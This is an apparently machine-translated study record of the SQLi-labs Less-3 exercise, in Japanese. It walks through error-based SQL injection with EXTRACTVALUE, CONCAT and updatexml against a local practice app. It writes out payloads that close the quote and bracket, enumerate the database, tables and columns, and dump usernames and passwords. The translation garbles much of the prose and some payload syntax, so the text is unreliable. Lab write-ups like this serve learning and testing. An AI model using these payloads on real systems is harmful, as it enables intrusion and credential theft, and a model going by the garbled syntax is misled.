Less3単一引用符は、注射を修正:マニュアル注入が与えられています
1注入の種類及び注入点か否かを判定する
入力されたIDの後に(1)」が、データベースless1を与え、less2同じではない、それ以上のここに与えられた以上)の入力がそれによって?ID = N時間を推測する、ここでデータベースステートメントはID SELECT =(「N-」)TBNAME *から実質的に実行される
+ページが表示され、通常の(白注:?ここ)は、SQLステートメントの前に閉鎖される- (2)URLをID = 1「と入力します)ブラケット、 -バックアノテーションコンテンツ+)
(3)を添加し、1 = 1,1 = 2と0は、単一引用符の注入点であり、与えられる注入の方法で変形させることができる試験で決定することができます。
データベース名を取得します。2.
?ID = 1 ' )とEXTRACTVALUE(1、CONCAT(0x7Eを、データベース()、0x7Eを)) - +
情報を考えると「〜セキュリティ〜:XPath構文エラー
」 セキュリティと呼ばれる見かけ上のエラーインジケータデータベース(白注:0x7eの進ここ進フラグです0X〜は、ある)
3. Accessテーブルを
?ID = 1 ' )とEXTRACTVALUE(1、CONCAT(TABLE_SCHEMA =データベース())、0x7EをINFORMATION_SCHEMA.TABLESから0x7Eを、(選択GROUP_CONCAT(テーブル名))) - +
报错信息XPATH構文エラー: '〜電子メール、リファラー、uagents、ユーザーの〜'
知られている現在のデータベーステーブルからのエラー情報3電子メール、リファラー、uagentsがあり、ユーザーが
フィールドを取得します。4.
?ID = 1 ' (ここで、TABLE_NAME = information_schema.columnsから1、連結(0x7Eを、(選択GROUP_CONCAT(COLUMN_NAME))とEXTRACTVALUE 'ユーザ' + - ))、0x7Eを)
情報の与えられたXPath構文エラー:「〜ID、
ユーザ名、パスワード〜」 ルックアップテーブルのフィールド名は、3人のユーザーがID、ユーザ名、パスワードです持っている
5.コンテンツ取得フィールド
?ID = 1 " )とEXTRACTVALUE(1、(選択GROUP_CONCAT(ユーザーからユーザー名、0x3a、パスワード))) - +
情報与えられ、ここで観測され、何の情報が使用されていないクエリを表示、追加情報には、完全には表示されません
http:// localhostの/ SQLI -ラボ/レス- 3 / ID?= 1 ' )とユーザ名がない(中にユーザーからのEXTRACTVALUE(1、(選択GROUP_CONCAT(ユーザ名、0x3a、パスワード)'ダム' '私は様-あなたの" ))) - +
ユーザー名とパスワードを取得することができます
もちろんLess3 6.はまた、本明細書に記載されていない、労働組合との共同問い合わせに注入することができます。
PSホワイト概要:
単一文字列に複数のストリングを接続する(1)CONCAT()関数は、任意のパラメータがnullヌルリターンである場合、結果文法連結(STR1、STR2、...)は、生成された文字列の連結を返す
(2 )extractValueの()は、クエリが値を含むストリングを返し、XML文書クエリの関数で
最初の引数は、2番目の引数が文字列のXpathフォーマットストリングであるextractValueの(対象文書、XMLパス)。
入力フォーマットのXpathパスは非常に関連する情報の照会コンテンツという、エラーになりますとき、注射のエラータイプを報告するために使用しEXTRACTVALUE()関数が間違っています。
(3)は、同様の方法があります updataxml()を。この関数は、新しいXMLドキュメントを持つ関数である
パラメータ更新(対象文書、XMLパス、更新されたコンテンツ)フォーマットストリング1は、2パラメータストリングは、XPath形式、フォーマット文字列パラメータ3で
エラー原理とEXTRACTVALUE同様の入力エラーがエラーのXpath形式、関連情報のクエリへのアクセスへのパスリード。
(4)Less3情報入力エラーAPOSによれば、IDの値は非常に重要であるブラケットの一組、に包まれてもよいと仮定する。
ホワイト注入学習記録!!